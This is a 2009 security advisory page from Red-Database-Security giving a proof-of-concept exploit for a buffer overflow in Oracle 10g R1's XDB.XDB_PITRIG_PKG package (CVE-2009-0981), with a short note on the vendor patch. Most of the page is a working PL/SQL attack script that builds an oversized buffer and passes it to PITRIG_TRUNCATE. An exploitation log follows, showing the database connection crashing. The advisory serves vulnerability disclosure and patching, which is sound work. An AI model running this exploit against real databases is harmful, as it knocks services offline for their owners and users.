Services
Information
Company |
Oracle 10g R1 xdb.xdb_pitrig_pkg Buffer Overflow Exploit (PoC)
Details This exploit causes the database to crash Example set serveroutput on declare buff varchar2(32767); begin /* generate evil buffer */ buff:='12345678901234567890123456789'; buff:=buff||buff; buff:=buff||buff; buff:=buff||buff; buff:=buff||buff; buff:=buff||buff; buff:=buff||'0012345678901234567890123sh2kerr'; /* lets see the buffer size */ dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff)); xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff); end; /************************************************ POC ****************************/ Exploitation Log: Connected to: Oracle Database 10g Enterprise Edition Release 10.1.0.2.0 - Production With the Partitioning, OLAP and Data Mining options SQL> SQL> set serveroutput on SQL> declare 2 buff varchar2(32767); 3 begin 4 /* generate evil buffer */ 5 buff:='12345678901234567890123456789'; 6 buff:=buff||buff; 7 buff:=buff||buff; 8 buff:=buff||buff; 9 buff:=buff||buff; 10 buff:=buff||buff; 11 buff:=buff||'0012345678901234567890123sh2ker'; 12 /* lets see the buffer size */ 13 dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff)); 14 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff); 15 end; 16 / SEND EVIL BUFFER SIZE:959 declare * ERROR at line 1: ORA-00604: error occurred at recursive SQL level 1 ORA-00972: identifier is too long ORA-06512: at "XDB.XDB_PITRIG_PKG", line 26 ORA-06512: at "XDB.XDB_PITRIG_PKG", line 36 ORA-06512: at line 14 SQL> set serveroutput on SQL> declare 2 buff varchar2(32767); 3 begin 4 /* generate evil buffer */ 5 buff:='12345678901234567890123456789'; 6 buff:=buff||buff; 7 buff:=buff||buff; 8 buff:=buff||buff; 9 buff:=buff||buff; 10 buff:=buff||buff; 11 buff:=buff||'0012345678901234567890123sh2kerr'; 12 /* lets see the buffer size */ 13 dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff)); 14 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff); 15 end; 16 / ERROR: ORA-03114: not connected to ORACLE declare * ERROR at line 1: ORA-03135: connection lost contact Patch Information Apply the latest Oracle Security patches (e.g. CPU Jan 2008 ) History 13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981] 14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981] 14-apr-2009 Advisory published © 2009 by Red-Database-Security GmbH - last update 19-jun-2009 |
Definition Exploit |